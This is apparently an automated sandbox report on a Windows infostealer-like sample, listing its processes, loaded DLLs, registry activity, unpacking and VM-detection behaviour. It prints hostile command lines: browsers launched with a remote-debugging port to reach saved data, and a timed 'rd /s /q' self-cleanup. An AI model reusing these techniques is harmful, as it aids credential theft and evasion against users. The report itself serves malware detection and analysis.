          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: chrome.exe, 0000000A.00000002.1563239627.00007824028E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
          Source: SJMO89RQI.0.dr, KXLFU3OHD.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: dZKPE9gotO.exeReversingLabs: Detection: 76%
          Source: unknownProcess created: C:\Users\user\Desktop\dZKPE9gotO.exe "C:\Users\user\Desktop\dZKPE9gotO.exe"
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exitJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msvcr100.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeUnpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeUnpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2EAB2 push ss; retf 0_2_00A2EABE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2EC9D pushfd ; ret 0_2_00A2ED61
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F42F push 64111D25h; ret 0_2_00A2F47F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F404 pushad ; ret 0_2_00A2F42E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2F404 push 64111D25h; ret 0_2_00A2F47F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2B64F push ebp; iretd 0_2_00A2B65A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2E199 push ecx; retf 0_2_00A2E19F
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2B7E8 push esp; ret 0_2_00A2B807
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A2ED07 pushfd ; ret 0_2_00A2ED61
          Source: dZKPE9gotO.exeStatic PE information: section name: .text entropy: 7.203655785812803

          Boot Survival

          barindex
          Monitors registry run keys for changes
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contain functionality to detect virtual machines
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: VMwareVM VMwareVMware VMwareVMware 0_2_00402BEB
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: dZKPE9gotO.exeBinary or memory string: DIR_WATCH.DLL
